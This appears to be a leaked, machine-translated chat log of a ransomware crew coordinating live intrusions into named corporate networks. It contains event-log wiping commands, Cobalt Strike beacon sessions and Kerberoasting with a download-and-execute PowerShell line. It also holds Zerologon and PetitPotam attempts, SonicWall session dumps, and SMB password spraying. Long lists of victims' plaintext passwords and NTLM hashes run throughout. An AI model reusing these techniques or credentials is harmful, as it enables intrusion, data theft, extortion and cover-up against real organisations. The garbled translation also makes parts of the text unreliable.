To display a list of logs registered in the system, run the command: WevtUtil enum-logs Clearing events in a particular log is done as follows: WevtUtil cl Setup Before clearing, you can back up the events in the logbook by saving them to a file: WevtUtil cl Setup /bu:SetupLog_Bak.evtx To clear all logs at once, you can use the Powershell commandlet Get-WinEvent to get all the log objects and Wevtutil.exe to clear them: Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName } or like this Wevtutil el | ForEach { wevtutil cl "$_"} 4 Log clearing can also be done from the classic command line: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" Log Cleaner Batnick PHP: break>"%CD%\server_log.txt" break>"%CD%\logs\errors.log" break>"%CD%\logs\log-core.log" break>"%CD%\logs\warnings.log" break>"%CD%\logs\plugins\mysql.log" Clear all Windows Event Viewer logs 1. CMD for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" 2. powerShell Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log } ``@@all eataly.com was once a long time ago such a res, please tell me who localized it) @slice aren't you by any chance? @t3chnolog ?[ ](https://stylebrooks.com/group/general?msg=AoceiT5ePNBEQeFbk) no root there pomoyu, it is always emptyVMware vcenterhyper-v? guys, has anyone decrypted root passes from vim base to hypervisors?the same or not commands take 5-15 minutes to execute disconnect sonic and check packet loss, unstable connection to the tim sevrverdono however, when i reconnected via posh, lag began only when i vpnku on sonic raised on nemya already reconnected via posh, the same shit99rdp addicts from amazon? and as ran excelshot on the new addic, the server begins to fiercely stupid guys, have you encountered problems? - I've got a new deck. - configured the exe file - ran it on the new dedic - The dead disk appeared in the cob - any commands in bacon are executed by 5-15 mindump with cmtp???? 
:face_with_monocle:outluckily make a dump of the mail from the smtp server, on the credentials, what software besides Thunderbird can be used? ``execute-assembly /home/user/txt/edu/Fast-Guide/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt ``Thank you, I'll check it manually,`` use rubus in the manual from the forum, I'll write back, it won't start via execute-assembly for some reason, then this is a rubus script, but should I put a link to rubus from githab in DownloadString? powershell.exe -exec Bypass -C "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https:// ``` you get it)``. [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ``` and put this parameter in front of IEX DownloadStringtry without importing it from github I thought verashell imports it directly into memory so psingectin works I wonder why it tries to download it from the localhost via a downloaded string is it not rubus? ``beacon> powershell-import D:\therOther\Invoke-Kerberoast.ps1 [*] Tasked beacon to import: D:\Other\Invoke-Kerberoast.ps1 [+] host called home, sent: 12760 bytes beacon> psinject 2384 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 [*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 into 2384 (x64) [+] host called home, sent: 134785 bytes [+] received output: ERROR: DownloadString : Exception calling "DownloadString" with "1" argument(s): "An exception occurred du ERROR: ring a WebClient request." 
ERROR: ERROR: At line:1 char:46 ERROR: + IEX (New-Object Net.Webclient).DownloadString <<<< ('http://127.0.0.1:8206/'); Invoke-Kerberoast ERROR: -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encodin ERROR: g UTF8 ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException ERROR: + FullyQualifiedErrorId : DotNetMethodException ERROR: ERROR: Invoke-Kerberoast : The term 'Invoke-Kerberoast' is not recognized as the name of a cmdlet, functio ERROR: n, script file, or operable program. Check the spelling of the name, or if a path was included, ver ERROR: ify that the path is correct and try again. ERROR: ERROR: At line:1 char:91 ERROR: + IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:8206/'); Invoke-Kerberoast <<<< ERROR: -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encodin ERROR: g UTF8 ERROR: + CategoryInfo : ObjectNotFound: (Invoke-Kerberoast:String) [], CommandNotFoundExcept ERROR: ion ERROR: + FullyQualifiedErrorId : CommandNotFoundException ERROR: ``Hi, guys no one faced, starting rubus script gives out:Guys, why can proxy in koba not start? I added a dedicce to the cob, PKM - pivoting - socks server - launch I can't always see it in proxy pivots but it is almost always broken. Does the dll injector from under kaspersky work? Or does it work ?here are all valid Sregel Porkchop2020! jforrest MNHY7ujm cmiklos gUBA40*r kmanoatl PortCity22124# bgrishkat SecondGirl$18 msallada P@mAm@nd@6 bstaudt Zelda22! bsirstins !Dunno55www grouse HaleyBug20! rwalker banBMWin2017!@ for vorks up there differentdth[e nfv hfpyst give me a login pass? 
so what you hooked a creed not a bad percentage of 10-15 percent gets through workinghf,jxfzna how much is this working topic by the way zerologon not tried here apparently vorks are offnu normcervaks pingedcthdfrb gbyue.ncz so everyone is watching no pings at allvpn tonoch work the only working sonic crudes have 13 days to livekready'.\Administrator:Sysadmin1' Administrator What token to get on the vorks on this pidtut if we get to put a clipokdavay evening will see what to do with them so need help) do not pull anything out of them I can not leave three vork logged in case the vpn will fall off ``[+] 101.1.10.43:445 - 10.1.10.43:445 - Success: '.\Administrator:Sysadmin1' Administrator [+] 10.1.10.32:445 - 10.1.10.32:445 - Success: '.\Administrator:Sysadmin1' Administrator [+] 10.1.10.40:445 - 10.1.10.40:445 - Success: '.\Administrator:Sysadmin1' Administrator [+] 10.1.10.44:445 - 10.1.10.44:445 - Success: '.\Administrator:Sysadmin1' Administrator [+] 10.1.10.66:445 - 10.1.10.66:445 - Success: '.\Administrator:Sysadmin1' Administrator [+] 10.1.10.67:445 - 10.1.10.67:445 - Success: '.\Administrator:Sysadmin1' Administrator This is a new krypt on monday i got a new krypt on Monday so i dont know how to start it but i just want to give it a go and try to add the domain, maybe it will work [-] 192.168.1.56:445 - 192.168.1.56:445 - Failed: '.\Administrator:Sysadmin1', ``failed to sysadmin on the servers looked under the domain it locale?directly on the controllergachekni smb login5fa7b5f9c23a16c0f9644cb907c85a95 Sysadmin1Sysadmin1 913147b3d5a680ae41f23b1d2bf1f293da wait ``DVK0HQ2\eisadmin 5fa7b5f9c23a16c0f9644cb907c85a95 DVK0HQ2\Guest 31d6cfe0d16ae931b73c59d7e0c089c0 DVK0HQ2\DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 DVK0HQ2\WDAGUtilityAccount 42da01550980089a444a5899ac6a053d DVK0HQ2\Administrator 913147b3d5a680ae41f23b1d2bf1f293 ``[+] host called home, sent: 12 bytes [+] host called home, sent: 12 bytes beacon> getsystem [*] Tasked beacon to get SYSTEM [+] host 
called home, sent: 2743 bytes [+] Impersonated NT AUTHORITY\SҮTSTEMKER: Need help ``beacon> getsystem [*] Tasked beacon to get SYSTEM [+] host called home, sent: 264391 bytes [-] could not spawn C:\WINDOWS\system32\wusa.exe: 740 [+] received output: getsystem failed. [+] host called home, sent: 12 bytes beacon> inject 912 null https_spotver beacon> sleep 2 [*] Tasked beacon to sleep for 2s [+] host called home, sent: 16 bytes beacon> hashdump [-] this command requires administrator privileges beacon> logonpasswords [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command [+] host called home, sent: 296058 bytes [-] could not spawn C:\WINDOWS\system32\wusa.exe: 740 [-] Could not connect to pipe: 2 beacon> execute-assembly C:\soft\SharpChrome\SharpChrome.exe logins /showall [*] Tasked beacon to run .NET program: SharpChrome.exe logins /showall [+] host called home, sent: 930377 bytes [-] could not spawn C:\WINDOWS\system32\wusa.exe: 740 beacon> execute-assembly C:\soft\Net-GPPPassword\Net-GPPassword.exe [*] Tasked beacon to run .NET program: Net-GPPPassword.exe [+] host called home, sent: 114731 bytes [-] could not spawn C:\WINDOWS\system32\wusa.exe: 740 beacon> execute-assembly C:/soft/Seatbelt/Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt" [*] Tasked beacon to run .NET program: Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt" [+] host called home, sent: 652435 bytes [-] could not spawn C:\WINDOWS\system32\wusa.exe: 740 ``but I don't know what to do next on the rdp I disabled sofos, session in the coboo got binary jumped ``[+] 10.1.10.50:445 - 10.1.10.50:445 - Success: 'EIS\Sregel:Porkchop2020!!!' Administrator [+] 10.1.10.32:445 - 10.1.10.32:445 - Success: 'EIS\bgrishkat:SecondGirl$18' Administrator [+] 10.1.10.40:445 - 10.1.10.40:445 - Success: 'EIS\bstaudt:Zelda22!' Administrator ``busted beacon> execute-assembly C:\softsoftsoft macafee sofos and sentinelchuvak turned out to be an admin on the same vorkjecto here? 
@alter in which confab you threw your zerologon? [*] Tasked beacon to run .NET program: SharpZeroLogon.exe EIS2019DC.eis.local [+] host called home, sent: 114257 bytes [+] received output: Performing authentication attempts... [+] received output: Unable to complete server challenge. Possible invalid name or network issues? ``Servers on ms17 are invulnerable and their self-servers are 2008 with creeds in the sense of jumping on the sevens to poryaday zerologon and 17-010 on the sevens `` well I'll take hell off`` ``. [+] 192.168.1.66:445 - 192.168.1.66:445 - Success: 'EIS\Sregel:Porkchop2020! i got through to them @alter @steven any idea how to start it let's say i uploaded some binary what to do with it i don't fucking know what to do here in the bookmarks like i have access to the fileshare of the server so i can't see the hrd i look after web authorization there is no hrd anywhere ?it sends some other codes to the mobile app usa it does not accept backups codes go check the domain admin [+] Checking URL https://66.208.26.12 [+] Found old SMA version (<9.x) [+] Appliance running version 9.0.0.7-22sv [+] Leaking sessions to dump configuration. [+] Attempting to dump sessions from https://66.208.26.12 [+] Found: SessionID: 11EX0qbJxgw0oxHnmy8JIVMXF1odMPLZFVNyyWT1MFU= userType: 1 userName: Sregel Password: Porkchop2020!! 
Domain: EIS [+] Found: SessionID: 2r22NuGvDeRcTXKEOr7AUjcQ0spvbucbZgRBv1071VU= userType: 1 userName: jforrest Password: MNHY7ujm Domain: EIS [+] Found: SessionID: D1KJjvBfSbYKdu614Kc0ZQuYTlI0wzS1xpN5jF9colg= userType: 1 userName: cmiklos Password: gUBA40*r Domain: EIS [+] Found: SessionID: GyTuUXiZLbVonpbsD31qB4QCHpkxI11xEyaiVx1ACTQ= userType: 1 userName: kmanoatl Password: PortCity22124# Domain: EIS [+] Found: SessionID: J9A0EFXfl4HAkj00LeK56DLLxu6YFoUrquKEMQVZc0A= userType: 1 userName: bgrishkat Password: SecondGirl$18 Domain: EIS [+] Found: SessionID: OuD0WnJK95pmxOGglFsh5dXpiKHHVWRl1pdERQnh7kc= userType: 1 userName: msallada Password: P@mAm@nd@6 Domain: EIS [+] Found: SessionID: UsAfbc265IgQmX49C3rPjgV1flhWkKeWBausk5HaL5U= userType: 1 userName: jpontzer Password: $KroKoo88KwoKoo Domain: EIS [+] Found: SessionID: bkt4BQbR111l1TMf9b8RQYDhtOrpFY0jILCuneZeCGE= userType: 1 userName: bstaudt Password: Zelda22! Domain: EIS [+] Found: SessionID: j9vcC7JOBCvr5VJgKocfEk5hMZlPbO5Pe7PQslj5Bj4= userType: 1 userName: bsirstins Password: !Dunno55www Domain: EIS [+] Found: SessionID: mr5HXc4QAy1Hz6fwcuCWXI9UlN1zk7ozS8Ac1G0akaw= userType: 1 userName: grouse Password: HaleyBug20! Domain: EIS [+] Found: SessionID: oXcf0mbsYkyHFpNx336zW7RwlaQUmbXp7MPFHW0jfC4= userType: 1 userName: jgoda Password: Pragti(82)@jg Domain: EIS with these sonics there's only one thing wrong with them, I'm going to try to retrieve the codes right now@alter I have to retrieve them, but all the sessions are dead, the usual 2fa with backup codes, what coba do you have, can I help you?vampiralterda ok, i'll get it right away@stakan take it for yourself right awaytakapAU Fucking 2 months this case lasts? have you looked? yes, i will do so from the looks of it so why not just take a separate folder listing and delete any other gui shredder? all with the past! 
hint, making a log of the deletion of the date, run the command ``erase /F /S /Q E:\FTP\targetname >> erase_all.txt``` because there are files with too long paths the command gets interrupted with an error like "file path is too long". I found a thread on stackoverfall with a similar problem, it was advised to make a mapping folder and apply the delete command to the linked folder. I did it, everything was deleted, but the log of the deleted files was not saved advise, mb someone already faced with this, how to solve? thank you very much give a list of avs that palyat, please dll*LLVM exe 5/23msvs x64 4/23llvm x64 was 2/23pm can someone dincheck? thanks)oh cool@all updated artifact, it was cleaned otherwise the sameBest Case Bankruptcy program opens the client base with this extension. I don't know if anyone can use it. Happy Victory Day to everybody! Happy Victory Day! :handshake:Happy Victory Day! :thumbsup: :thumbsup: :thumbsup:.) Happy Victory Day to all comrades)Happy Victory Day, gentlemen! 2020-2021 Ransom - repeat :))Happy Holidays to all! proton gives you to register if sox normal btw. such as with lux lux extra wedge +1 to karma)[ ](https://stylebrooks.com/group/general?msg=yEHSkuvicFssvNEWc) account should be called by a normal name, without firms and so on and originally should react with a clean ip, then at least with what come zahpishu write them that I am a decent type and did not violate, but no response so far)it is true, but there is one but)I incidentally proton once registered for 10 minutes e-mail, there was a code and I normally zagoregalitutanota normal? where is the best place to get anonymous emails? Proton began to fuck my head with registration (i updated java, the most interesting thing i restart without closing the first window, and it opens correctly at the top of the first window. 4.3 does not work so what version of java? I start with a wind-up server, ehashnikwas, I changed pps and normal)) All shalom! Who has run into this? 
@terner write in PMhuy holiday):partying_face::fireworks:Happy Encryptor Day all) :Dah, well, I thought something else) ipi will change, and the hostname is notLS1818.dkengr.coma what is the hostname? if the host of the employee, then you have to remember the host name, not if the host is now offline and its ip is busy? when the host goes offline its ip is taken by another host, the distribution by DHCP but since the dns entry points to some ip, it is pinged, so you have such a hat happensDHCPHello all, colleagues here is the situation: there is a YES and his car iris_borra LS181818 When pinging the hostname ``` Pinging LS1818.dkengr.com [10.1.20.15] with 32 bytes of data: Reply from 10.1.20.15: bytes=32 time=18ms TTL=127 Ping statistics for 10.1.20.15: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 18ms, Maximum = 18ms, Average = 18ms ``` and users ``` Directory of \10.1.20.15\c$\users 09/03/2019 03:05 PM . 09/03/2019 03:05 PM . 09/03/2019 02:51 PM dkuser 12/06/2020 03:13 PM iris_borra 10/30/2019 09:44 PM public 0 File(s) 0 bytes ``` some time later ``` shell dir "\\10.1.20.15\c$\users\\iris_borra\Downloads\" [*] Tasked beacon to run: dir "\\\10.1.20.15\c$\users\\iris_borra\Downloads\" [+] host called home, sent: 80 bytes [+] received output: The system cannot find the path specified. shell dir "\\10.1.20.15\c$\users" [*] Tasked beacon to run: dir "\\\10.1.20.15\c$\users" [+] host called home, sent: 58 bytes [+] received output: Volume in drive \10.1.20.15\c$ is OS Volume Serial Number is 52A8-6845 Directory of \10.1.20.15\c$\users 06/26/2020 03:16 PM . 06/26/2020 03:16 PM . 
05/31/2019 03:03 PM administrator 05/31/2019 02:50 PM dkuser 03/16/2021 08:40 AM paul_munoz 04/26/2019 03:21 PM public 11/29/2020 09:06 PM Wendy_Munoz ``` and the polzak just disappears from the car, on another ping: ``` Pinging LS1818.dkengr.com [10.1.20.15] with 32 bytes of data: Reply from 10.1.20.15: bytes=32 time=13ms TTL=127 Ping statistics for 10.1.20.15: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 13ms, Maximum = 13ms, Average = 13ms Directory of \10.1.20.15\c$\users 06/26/2020 03:16 PM . 06/26/2020 03:16 PM . 05/31/2019 03:03 PM administrator 05/31/2019 02:50 PM dkuser 03/16/2021 08:40 AM paul_munoz 04/26/2019 03:21 PM public 11/29/2020 09:06 PM Wendy_Munoz ``` When querying through the hostname ``` shell dir \LS1818.dkengr.com\c$\users [*] Tasked beacon to run: dir \\LS1818.dkengr.com\c$\users [+] host called home, sent: 63 bytes [+] received output: Logon Failure: The target account name is incorrect. ``` anyone encountered this? how is it cured? Truly work rans! Mutual! Happy holidays to all!!! Happy May Day, gentlemen! Peace! Labor! Rance! 
Who decrypted ultraVNC?ini , there's a hash{"$binary":"8kWjqI0y8R+MNt/Kub61wAPryhMSHUtb9U5HZdyStO1UZFZugftryBYpesOxjRkSHkIpKUfUQ3iZ8Y6PgUMTyD3Pd69Fwo6HuYH0uK2WT5eHdm0Ru8pyrkCPDWs3/WyZRviJGj6MaEHpvu4MqaPipVv8nIczyt2qjBZQY/W/4DkaAmvdGdLlmDQl2V7al69LkGfR6nZrELn0K1CrLtzHO5ubVeLPCR1HzXIUj6qfqSy8D9jL"}{"$binary":"qlY9Yy/uKCOjgjFaDHegKKYKuWCtCV5e4xxcN73o9Y3T1EeAbrKGJELVsZncMlxqppiOlLXDIsWILbkknTxKzZKx6fgducw1SagGWekXyIHQRMk9viX7pzOASl31nvLdTcIF0f6hBro8EF4EL08nY4D/+Jz0INaiE54PZ9s+TcmUpeXxHf6CDZGjoX+ZpIBgqRANdMydjWhAgYEqfvaI1"}{"$binary":"xPACqYgFfTMW286bcFZjKwwFOzc9DMCuywe1mtRataDIZEf6cI2BsEX6eClML8xkzpgVRsx5o1bg7wBrz9VtvrAz2RPRjwPpZ1N8ijcGR/idLDAUpsv6EPHjJMKt4CdWZcriyFj1d9nqz/yQOTZ7sp4F/8W3nzqy1mIzTaecw+z247sVv3mQTDb7QSVahenetbKpXtM9QYaEgav1Bih9LlsVZhUqAuTggtZMs9t4FQ=="}{"$binary":"LrqENVpIrVsphbKn+Qnm6ZoLgeO0/VgmGzo1QrHjJeFnlHlUNHWfxozW3m9uRGVSHnYH1wZKqV7yMg9/uVC/XqUGaF3zgdIKJpi5gvsQ0VNS5wmwjG/TsiJSrA8AKMyiiaAMivi5oZGtYecTKOFGh7h+F2M+cyKsGRy0l8uHs0SfAOkvID0vPmR9zbFdOez9L1+P6FHWsCVh+JoYyQ2aBV6rWn0CM7uzHY1t0HNU0A=="}hi@alter please add jaskaga ok@all about pouring the data on "silent" we will do it at the end of this week, please structure the data on old cases not to stretch this process too long, I will create news and give accesses / company codes to fill@all a set of alternatives to ngrock, for tunneling https://github.com/anderspitman/awesome-tunneling but there's a newer version of this, we won't be filming it today@all friends, I'm going to bed early today, if anyone needs cases, PM me please --ftp-user --ftp-user is interesting, is there an example command?
If megasync lags, can not download the archive or the speed is very low, you can use the same rclone to unload the archive rclone.exe move remote:archive E:\ -P --multi-thread-streams 12 --transfers 12 where remote is the name of the config, archive is the name of the folder, E:\ is the folder where the archive will be dumped, -P shows the progress of the download, to not see any progress change it to -q, --multi-thread-streams and transfers for high downloads really helped a lot to cope with anomalies in the form of 200 kb/s and when the archive is downloaded 500 times and eventually not saved to disk ``OK, it worked. but you have to ctrl+c ctrl+v at once, and only then do archiving, because archiving takes a fuckload of time, and copying 1-1.5 minutes, then you can already archive and downloadThe basic difference between OST and PST is that OST files are used to save data for offline use and are stored in MS Exchange Server. Whereas PST files are personal folder data and stored on client's hard disk. but i could be wrong - it's been a while since i got mail like this - i don't remember but it might have worked you know what copy and paste it in explorer outlook make a copy near it and return the outlook to the crawlspace) nst xhost is the in and out of the mail pst is confused with nst nst weighs 16gb - it's copied via shadow outst weighs 12gb, some hosts have 25gb. pst is a mail archive kill the outlook, make a copy quickly and get the copy back i have a problem with outlook copying mail from a host via smb? i make an outlook copy, then i copy an nst file that weighs 20-30mb - it's copied successfully, but copying is successful, but the file does not appear even after a couple hours i fucked up a couple of archives when i downloaded it from mega not so long ago too...this is a feature of the fpt protocol. 
break the file into smaller pieces and monitor the plum on fpt if the connection is broken he starts downloading again, it's like a prank and rights, I kick the user who sends the archive to the server, he reconnects instantly, the server deletes the archive and starts downloading again I removed the rights to delete and all seemed to be normal, in 2 hours, I will tell the server will help? some kind of heisenbug, before only one of the five files behaved as strange as disabling the rights of the user to delete anything in the folder downloaded, deleted, and downloads again ))))[ ](https://stylebrooks.com/group/general?msg=Q8pfTaZX3zAkSuWE6) do not believe me, but with ftp some anomaly occurs he downloads the whole archive, then just re-connects and starts downloading again and there's $100 for 2TBA so Pcloud lives longer, but they can also aboot it, and it also connects to pclone.why i've downloaded an archive of 100 gig from mega for the second time, it successfully downloaded, then deleted and the download begins to go again? before it was even successfully downloaded, but then deleted a day later if it does not rise - network proaktivka cuts the first vpn up, then the sessionparny, maybe someone has faced similar problems and advise how to be...in general, I threw my addy in the coba and raised the addy to the coba, as soon as I raise the ipn, the network in the coba dies. hello all !yes, I just decided that I packed through 7z, it did not fuck up and no problems assembled the archive in 7z can be set way of encoding What archiver do you use?i understand you can rename it) but you don't want to when you are in a hurry? there is a solution for french fuckin' coding:pray:https://www.sendspace.com/file/cw7h2d - 30 days available i'll send you the info then what's wrong, not enough to fill it thanks you'll have to wait) is filling all hi):wave maybe someone has a video on ms17 throw pliz :slight_smile: :handshake:by prescribing you mean him and the logonserv? 
by creating an asset directory domain with the same name. ``Who has encountered EPC Check fail on SonicWall If the check (and it often is) only on the occurrence of your machine in the domain, you can bypass it by creating an active directory domain of the same name. Which domain is needed - can be seen in SonicWall's log @sargon add please, I'm sure often such a protection which bypassed half an hour hour ... so from the off site you can download the same guys have a client under vSphere ?`ctrl+shift+esc ` - open task manager just wanted to write) decided: in the username was a backslash and it was not shielded normally from this and error@all guys, who got this error when decrypting viam? I got the hashes with = - at the end decrypted all right, but the ones without gave out the following error: ``` veeam.cs(21,32): error CS1009: Unrecognized escape sequence ``New vpns given to work as well as the collection 2fa codes needed, tentatively should be ready and go in hand by 22nd of MoscowPrimary@all sorry, yesterday was absent for personal reasons koba clean, with each time just more and more difficult ... when the alt will be online who knows? anyone decrypted passes from SAP? and want to staging the domain (or IP) is written in both fields or only in staging-poley what to do, artkit with detektskogo cost koba clean? I did on this manu, maybe help someone. `https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/ `through a pass ticket can get on C$ and do anything, nds shoot for example at the output should be a tgt ticket from DC$ (spn account cd) write down who will be able to untwist to the end of this attack, I do not have the right targets>Exception: Client does not support SMB2 this means that smb3 is usedhttp://github.com/bats3c/ADCSPwnFound the manuscript, but for some reason python script spits this error. 
``` Traceback (most recent call last): File "/usr/local/lib/python3.7/dist-packages/impacket/smbserver.py", line 4281, in processRequest connId, self, packet, True) File "/usr/local/lib/python3.7/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 149, in SmbNegotiate raise Exception('Client does not support SMB2, fallbacking') Exception: Client does not support SMB2, fallbacking ``Gentlemen, hello there. Has anyone been smoking this? ``https://github.com/topotam/PetitPotam``@all folks, has anyone localized the nix servers (ubuntu, debian) if you give the command ./encryptor --path / --prockiller from root then lock the entire server with the system files (passwd, shadow, sshd as an example), actually slow down skl, apache and other services and their lockant and the server will be unavailable? yes ok give the full composition of hell from here should seeomuchomu in a privately not see your messages, and in groups all normal wait 10-15 minutes will attach you to someone else, I remember hey hey, I am the new admin. have any work to practice? Tomorrow at 7 gathering will be fine In 3-4 rounds in 12 hours we can start now 8 am what time we will close the network @alter need a build102 gb62 gb already downloaded ``gic\administrator G3n3r@l1$ gic\atgadministrator @ltt3ch$ gic\s-365 G3n3r@l1$ ``````Members ------------------------------------------------------------------------------- Administrator atgadmin AtgNet BSchlegal s-365 The command completed successfully. 
``Pumping started jumping ?-yeah windows will finish them there just 400 pieces everything will be yes I just vorki pinged put@Air brother let's jump take the balls and unload them here at the entrance of the admin caught well here somehow izidajte jumpzatel[+] 172.22.9.18:445 - 172.22.9.18:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator [+] 172.22.9.5:445 - 172.22.9.5:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator [+] 172.22.9.3:445 - 172.22.9.3:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator [+] 172.22.9.17:445 - 172.22.9.17:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator [+] 172.22.9.196:445 - 172.22.9.196:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator [+] 172.22.9.2:445 - 172.22.9.2:445 - Success: 'gic\administrator:G3n3r@l1$' Administrator [*] Scanned 6 of 8 hosts (75% complete) [+] 172.22.9.24:445 - 172.22.9.24:445 - Success: 'gic\administrator:G3n3r@l1$' Administratorknow sb prognosticating pingnutsperer 172.22.9.18 172.22.9.17 172.22.9.5 172.22.9.196 172.22.9.9 172.22.9.2 172.22.9.24 # Lady, you haven't pinged yet? # # If not, let's ping pong access # # Wouldn't it be nice if we could get the admin to ping pong? # pid it's my dedic185.150.189.202 koba we kinda have an admin first we're interested in servers can you run smb login 15 servers and 402 vork[ ](https://stylebrooks.com/group/generalinsulation.com?msg=p4dd4ySGDjecmh9g2) hello , help what? okvpn up now i'll raise the vpn and run everything on smbokytevin gobbyvampir guys gobbytu i guess domain admin at the entrance directly ``` [+] Checking URL https://69.84.159.94 [+] Found latest version (9.x+) of SMA appliance [+] Appliance running version 10.2.0.1-18sv [+] Leaking sessions to dump configuration. 
[+] Found: SessionID: 0agye8ssdBaNcrk6Zl0WqVCxdNYplgJ5gBlRAMhUlEA= userType: 1 userName: dlyons Password: maggie1999 Domain: GIC.Local [+] Found: SessionID: 0y3mQ3Y1Nf1DhqnUW5N0wI6BX7DkSqkbMvvs0e7g8g8= userType: 1 userName: ecasterline Password: maggie Domain: GIC.Local [+] Found: SessionID: 3u0H0cRw90px9P8w6EzfSMDix5nE0EUueuAYNM4U02U= userType: 1 userName: pdonovan Password: #32Wilkins# Domain: GIC.Local [+] Found: SessionID: 4N6urKz1seDuCRwnBe1RlvtwKrXpRhqoGoStFime3cLM= userType: 1 userName: dsweeney Password: Welcome123$ Domain: GIC.Local [+] Found: SessionID: 5WMU0MCfO1HoETuBIPbCA8LDug0Su8hL9UVR4u1P100= userType: 1 userName: speschl Password: Walleye5252! Domain: GIC.Local [+] Found: SessionID: 9sIZQSAJ4YZ391RLGh86y4cAqVAeU09BdfAy6N8FaK8= userType: 1 userName: dferdinand Password: jessica Domain: GIC.Local [+] Found: SessionID: AHpEryyF019muOFFJwkke7moSfaB12pM4am7xTUEQh7o= userType: 1 userName: tmeegan Password: Bassman1! Domain: GIC.Local [+] Found: SessionID: AJPLSQg1gpryzZOG0sovAedr9GctS1seHcGYTDk8Bek= userType: 1 userName: msnodgrass Password: Husmuog@1980 Domain: GIC.Local [+] Found: SessionID: DWOjoF2e6oP6kvRKDjslkJCOi9WY80TAgwj1eSeKtiU= userType: 1 userName: wbrooks Password: Grace123$ Domain: GIC.Local [+] Found: SessionID: EiyHS96h47h544VyrFpwzaigmdT7l9PFOXBDCa7idfs= userType: 1 userName: mclinger Password: bosox Domain: GIC.Local [+] Found: SessionID: FeP72wVY8uhKgQgR1vaJwkTKw5VG3s1KOJvvKm6xQI= userType: 1 userName: rrenaud Password: trymer Domain: GIC.Local [+] Found: SessionID: GbsIiEmyryOMSas8qR9xAgc3hceH60znCnVWIo32Gc= userType: 1 userName: dmidura Password: trintrin49 Domain: GIC.Local [+] Found: SessionID: JpyHlguSmyzdo5PdsflWpJSR9YOtJXiF6FUNy4cD03c= userType: 1 userName: mgonzalez Password: Warmup90! 
Domain: GIC.Local [+] Found: SessionID: K2C27y1YPPhgkD2A5KZdrtcJqL8kWZVMzXEuDWkUwQ= userType: 1 userName: mcollins Password: Sandycjr5# Domain: GIC.Local [+] Found: SessionID: K93x9o5n5E8pCMXlcZ7Q3AUWaFm9wLvYjjWdSqnvqdI= userType: 1 userName: jmoore Password: 1oliviaZ Domain: GIC.Local [+] Found: SessionID: L7yJQQCujzM3qJiBoR1jWtDmTInBNhqIeFo0bvEsC6o= userType: 1 userName: fr2granara Password: frank25 Domain: GIC.Local [+] Found: SessionID: Ov17M0I1P0E0wNfYhQC0eH9NQM0lqOZCOA6Jpaiekus= userType: 1 userName: gtowle Password: Drifters2$ Domain: GIC.Local [+] Found: SessionID: PtTgV72emTIxe04dvnF2WTyuEGNb0S7qPEaFDFTTxHg= userType: 1 userName: rcampbell Password: alex11 Domain: GIC.Local [+] Found: SessionID: QBDBUhXvWk1jyBX7xNBK5qc5VFHteEvn1pFtE1LjVAQ= userType: 1 userName: cmarmaduke Password: customer Domain: GIC.Local [+] Found: SessionID: QDsmuPP7OAnWyOOubJQQyZHdlGvAd0dSG7zW0MTRUKM= userType: 1 userName: wgardiner Password: Melrose2 Domain: GIC.Local [+] Found: SessionID: Wcr9AaobUMuJUXwISbBZBvsuoyJ1s7iMhbq5d0iKcDY= userType: 1 userName: barcure Password: willieb17 Domain: GIC.Local [+] Found: SessionID: ZR21V7zgJXk60SBi7dcxfsVyQMQTWt88jQlZOH0UQWg= userType: 1 userName: lraab Password: Floorplan18 Domain: GIC.Local [+] Found: SessionID: axlkOmu2994Gep7JspYjuqtL4ZkpV91yaQaTzc0LVo= userType: 1 userName: esheara Password: Freddyc256 Domain: GIC.Local [+] Found: SessionID: dP7r6R7kKD58IiZ0djlSTNguhsxZcMzr0KRJ4A40fXg= userType: 1 userName: aoral Password: @nthony1 Domain: GIC.Local [+] Found: SessionID: eQwhnplhToF16fqjkJjzgxvVtduIBON0qz3CtuEe6zk= userType: 1 userName: mcoleman Password: coleman5912 Domain: GIC.Local [+] Found: SessionID: f4Kqq8okWmvVbQb1zscKa0naph4EQBF2PrxdD4X17qnuw= userType: 1 userName: kcarabello Password: Nicnkay7* Domain: GIC.Local [+] Found: SessionID: fdWOLpEau4d95qsAASBb1DGPVFvPhTv9DD0pEV8WlA= userType: 1 userName: plenzie Password: Blizzard1 Domain: GIC.Local [+] Found: SessionID: h5K7GKiSNw0iFC4w0FyvoBEiaL3nS1Y3UO1Z6tNDVAw= userType: 1 
